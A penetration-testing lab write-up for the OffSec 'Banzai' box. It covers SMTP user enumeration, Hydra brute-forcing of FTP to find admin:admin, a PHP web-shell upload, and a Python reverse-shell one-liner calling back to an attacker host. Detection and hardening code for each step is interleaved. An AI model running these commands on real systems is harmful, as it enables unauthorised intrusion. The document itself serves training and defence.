# Banzai (WIP)

## Nmap

```
sudo nmap 192.168.233.56 -p- -sS -sV

PORT     STATE  SERVICE    VERSION
20/tcp   closed ftp-data
21/tcp   open   ftp        vsftpd 3.0.3
22/tcp   open   ssh        OpenSSH 7.4p1 Debian 10+deb9u7 (protocol 2.0)
25/tcp   open   smtp       Postfix smtpd
5432/tcp open   postgresql PostgreSQL DB 9.6.4 - 9.6.6 or 9.6.13 - 9.6.17
8080/tcp open   http       Apache httpd 2.4.25
8295/tcp open   http       Apache httpd 2.4.25 ((Debian))
Service Info: Hosts:  banzai.offseclabs.com, 127.0.1.1; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
```

SMTP is open on the host. Enumerating usernames with `smtp-user-enum` over the `VRFY` command reveals the following:

```
sudo perl smtp-user-enum.pl -M VRFY -U /usr/share/seclists/Usernames/Names/names.txt -t 192.168.233.56
```

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-694748f9446322a5694af1a5a1894820dc251b55%2Fimage.png?alt=media)

The user `admin` is not a default account on Linux / Unix systems, so it is worth brute-forcing this account against the relevant services, starting with FTP.
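From the defender's side, the enumeration above only works because Postfix answers `VRFY` with a per-address verdict. The fragment below is an added example, not part of the writeup or the lab host's configuration: it shows the permissive setting next to the hardened one. `disable_vrfy_command` is Postfix's own `main.cf` parameter; the surrounding file contents are constructed.

```ini
# /etc/postfix/main.cf (constructed fragment, not the lab host's file)

# Permissive (the Postfix default): VRFY reports whether each address is
# deliverable, so a wordlist run such as smtp-user-enum above can confirm
# which local accounts exist.
disable_vrfy_command = no

# Hardened: VRFY is refused for every address, so the server no longer
# confirms usernames. Reload Postfix after changing the file.
disable_vrfy_command = yes
```

Disabling `VRFY` does not stop `RCPT TO` probing, so it is a cheap reduction of the enumeration surface rather than a complete fix; rate limiting and alerting on bursts of rejected recipients cover the rest.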

We receive no hits with Hydra after 30 minutes.

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-4560ce03151253793d49be59f50ceb707a4615cd%2Fimage.png?alt=media)

However, trying the Mirai password list shipped with Metasploit succeeds with `admin:admin`.

```
hydra -l admin -P /usr/share/wordlists/metasploit/mirai_pass.txt ftp://192.168.233.56
```

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-a22807f3d43bedc587ea477fe450d9621c433a53%2Fimage.png?alt=media)

Logging in over FTP appears to land in the web server's document root. Knowing this, we can upload a shell of our own. A PHP web shell will be sufficient, since the directory listing shows PHP is supported.

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-c585ee2a7b990b2a656cd541a003c98cf1719a36%2Fimage.png?alt=media)

Using the FTP `put` command we can upload a web shell, then browse to it at <http://192.168.233.56:8295/webshell.php>
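Both the credential guessing and the upload above leave a clear trail in vsftpd's own log, so here is an added detection example (not part of the writeup) that covers the two steps at once: it parses `/var/log/vsftpd.log` lines, flags a client that fails login repeatedly inside a short window (and notes whether a later login from that client succeeded), and flags successful uploads of server-side script files. The log lines embedded below are constructed to follow vsftpd's default log format; the thresholds and the extension list are assumptions to tune per environment.

```python
"""Flag FTP credential guessing and script uploads in a vsftpd log.

Added example, not from the writeup. SAMPLE_LOG is constructed in
vsftpd's default /var/log/vsftpd.log format; it is not the lab host's log.
"""
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

SAMPLE_LOG = """\
Mon Mar  2 10:15:01 2020 [pid 1201] [admin] FAIL LOGIN: Client "192.168.49.233"
Mon Mar  2 10:15:01 2020 [pid 1202] [admin] FAIL LOGIN: Client "192.168.49.233"
Mon Mar  2 10:15:02 2020 [pid 1203] [admin] FAIL LOGIN: Client "192.168.49.233"
Mon Mar  2 10:15:02 2020 [pid 1204] [admin] FAIL LOGIN: Client "192.168.49.233"
Mon Mar  2 10:15:03 2020 [pid 1205] [admin] FAIL LOGIN: Client "192.168.49.233"
Mon Mar  2 10:15:03 2020 [pid 1206] [admin] OK LOGIN: Client "192.168.49.233"
Mon Mar  2 10:16:10 2020 [pid 1206] [admin] OK UPLOAD: Client "192.168.49.233", "/webshell.php", 2511 bytes, 1.20Kbyte/sec
Mon Mar  2 11:00:00 2020 [pid 1300] [alice] FAIL LOGIN: Client "10.0.0.5"
Mon Mar  2 11:00:09 2020 [pid 1301] [alice] OK LOGIN: Client "10.0.0.5"
Mon Mar  2 11:01:00 2020 [pid 1301] [alice] OK UPLOAD: Client "10.0.0.5", "/report.pdf", 10240 bytes, 50.0Kbyte/sec
"""

# One vsftpd log line: timestamp, pid, optional [user], OK|FAIL ACTION, client IP,
# and for transfers the quoted path. CONNECT lines have no OK/FAIL and are skipped.
LINE_RE = re.compile(
    r'^(?P<ts>\w{3} \w{3}\s+\d{1,2} \d\d:\d\d:\d\d \d{4}) '
    r'\[pid \d+\] (?:\[(?P<user>[^\]]*)\] )?'
    r'(?P<result>OK|FAIL) (?P<action>[A-Z]+): Client "(?P<ip>[^"]+)"'
    r'(?:, "(?P<path>[^"]+)")?'
)

# Extensions the web server would execute if dropped into the document root (assumption).
SCRIPT_EXTS = (".php", ".phtml", ".php5", ".jsp", ".asp", ".aspx", ".cgi", ".pl", ".py")


def parse_vsftpd_log(text):
    """Turn log text into a list of event dicts with a datetime under 'ts'."""
    events = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        ev = m.groupdict()
        ev["ts"] = datetime.strptime(ev["ts"], "%a %b %d %H:%M:%S %Y")
        events.append(ev)
    return events


def detect_login_bursts(events, threshold=5, window=timedelta(seconds=60)):
    """Map client IP -> summary for clients with >= threshold FAIL LOGINs inside `window`."""
    recent = defaultdict(deque)   # ip -> timestamps of failures still inside the window
    flagged = {}
    for ev in events:
        if ev["action"] != "LOGIN":
            continue
        ip = ev["ip"]
        if ev["result"] == "FAIL":
            q = recent[ip]
            q.append(ev["ts"])
            while ev["ts"] - q[0] > window:   # slide the window forward
                q.popleft()
            if len(q) >= threshold:
                hit = flagged.setdefault(ip, {"failures": 0, "users": set(), "success_after": False})
                hit["failures"] = max(hit["failures"], len(q))
                hit["users"].add(ev["user"])
        elif ip in flagged:
            # A successful login after a burst means one of the guesses worked.
            flagged[ip]["success_after"] = True
    return flagged


def detect_script_uploads(events, exts=SCRIPT_EXTS):
    """Return successful uploads whose file name ends in a server-side script extension."""
    return [
        {"ts": ev["ts"], "user": ev["user"], "ip": ev["ip"], "path": ev["path"]}
        for ev in events
        if ev["result"] == "OK" and ev["action"] == "UPLOAD"
        and ev["path"] and ev["path"].lower().endswith(exts)
    ]


if __name__ == "__main__":
    evs = parse_vsftpd_log(SAMPLE_LOG)
    for ip, hit in detect_login_bursts(evs).items():
        print(f"login burst from {ip}: {hit['failures']} failures, users={sorted(hit['users'])}, "
              f"success afterwards={hit['success_after']}")
    for up in detect_script_uploads(evs):
        print(f"script upload by {up['user']} from {up['ip']}: {up['path']} at {up['ts']}")
```

A burst followed by a successful login is the case to page on, since it is exactly what the Hydra run above produced. On the prevention side, vsftpd's `write_enable` directive controls whether uploads are allowed at all, and `local_root` can point accounts at a directory outside the web server's document root, so that even an authenticated user cannot turn an upload into a web shell.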

![http://192.168.233.56:8295/webshell.php](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-5c9640adefef8279c1dd91cf028a8ab14d3249d3%2Fimage.png?alt=media)

A Python reverse shell was then executed through the web shell, connecting back to a listener on port 21, to gain a full shell.

```
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.49.233",21));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("/bin/sh")'
```
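On the host, the one-liner above has a distinctive shape: `os.dup2` makes the outbound socket the stdin, stdout and stderr of the interpreter and of the `/bin/sh` it spawns, and the whole chain runs as the web server's user. The script below is an added example (not from the writeup) that looks for exactly that: `find_socket_stdio()` works on plain process records so it can be exercised on constructed data, and `collect_from_proc()` builds those records from `/proc` on a live Linux host. The process names, user names and fd targets in `SAMPLE_PROCS` are constructed; the interpreter and web-user lists are assumptions.

```python
"""Find processes whose standard streams are a network socket (reverse-shell shape).

Added example, not part of the writeup. collect_from_proc() is Linux-only;
find_socket_stdio() takes plain dicts and runs anywhere.
"""
import os

# Shells and interpreters that should not normally have a socket as their stdio (assumption).
INTERACTIVE = {"sh", "bash", "dash", "zsh", "python", "python2", "python3", "perl"}
# Accounts a web server runs as; a shell with socket stdio under one of these is the worst case.
WEB_USERS = {"www-data", "apache", "httpd", "nginx"}

# Constructed snapshot resembling a host after the one-liner above ran (not real data).
SAMPLE_PROCS = [
    {"pid": 1, "comm": "systemd", "user": "root", "parent_comm": "",
     "fds": ["/dev/null", "/dev/null", "/dev/null"]},
    {"pid": 612, "comm": "apache2", "user": "www-data", "parent_comm": "apache2",
     "fds": ["/dev/null", "/dev/null", "/var/log/apache2/error.log"]},
    {"pid": 2310, "comm": "python", "user": "www-data", "parent_comm": "sh",
     "fds": ["socket:[41322]", "socket:[41322]", "socket:[41322]"]},
    {"pid": 2311, "comm": "sh", "user": "www-data", "parent_comm": "python",
     "fds": ["socket:[41322]", "socket:[41322]", "socket:[41322]"]},
    # A daemon started from inetd legitimately gets the connection on its stdio: low severity.
    {"pid": 700, "comm": "vsftpd", "user": "root", "parent_comm": "inetd",
     "fds": ["socket:[51000]", "socket:[51000]", "socket:[51000]"]},
]


def find_socket_stdio(procs, shells=INTERACTIVE, web_users=WEB_USERS):
    """Return a hit per process with a socket on fd 0, 1 or 2, graded by how suspicious it is."""
    hits = []
    for p in procs:
        socket_fds = [i for i, target in enumerate(p["fds"]) if target.startswith("socket:")]
        if not socket_fds:
            continue
        if p["comm"] in shells:
            severity = "critical" if p["user"] in web_users else "high"
        else:
            severity = "low"   # socket-activated services land here
        hits.append({"pid": p["pid"], "comm": p["comm"], "user": p["user"],
                     "parent_comm": p["parent_comm"], "socket_fds": socket_fds,
                     "severity": severity})
    return hits


def _read(path, default=""):
    try:
        with open(path) as f:
            return f.read().strip()
    except OSError:
        return default


def collect_from_proc():
    """Snapshot every visible process in /proc into the record shape find_socket_stdio() expects.

    fd links are only readable for your own processes unless you run as root,
    so unreadable entries are recorded as "" and never match.
    """
    import pwd
    records = []
    for pid in filter(str.isdigit, os.listdir("/proc")):
        base = f"/proc/{pid}"
        fds = []
        for fd in range(3):
            try:
                fds.append(os.readlink(f"{base}/fd/{fd}"))
            except OSError:
                fds.append("")
        ppid, uid = "0", 0
        for line in _read(f"{base}/status").splitlines():
            if line.startswith("PPid:"):
                ppid = line.split()[1]
            elif line.startswith("Uid:"):
                uid = int(line.split()[1])   # real uid
        try:
            user = pwd.getpwuid(uid).pw_name
        except KeyError:
            user = str(uid)
        records.append({"pid": int(pid), "comm": _read(f"{base}/comm"), "user": user,
                        "parent_comm": _read(f"/proc/{ppid}/comm"), "fds": fds})
    return records


if __name__ == "__main__":
    procs = collect_from_proc() if os.path.isdir("/proc") else SAMPLE_PROCS
    for hit in sorted(find_socket_stdio(procs), key=lambda h: h["severity"]):
        print(f"[{hit['severity']}] pid {hit['pid']} {hit['comm']} as {hit['user']} "
              f"(parent {hit['parent_comm']}) socket on fds {hit['socket_fds']}")
```

Run as root to see every process; a `sh` or `python` owned by the web server user with all three streams on one socket is the case that matters. The network side of the same event is an outbound connection from the web server to an unexpected host on an unusual port, which is why the listener on port 21 above is worth watching for in egress logs even though 21 looks like ordinary FTP.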

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-012da867c7664d91cb31c75a25e8c6063cd73ac8%2Fimage.png?alt=media)
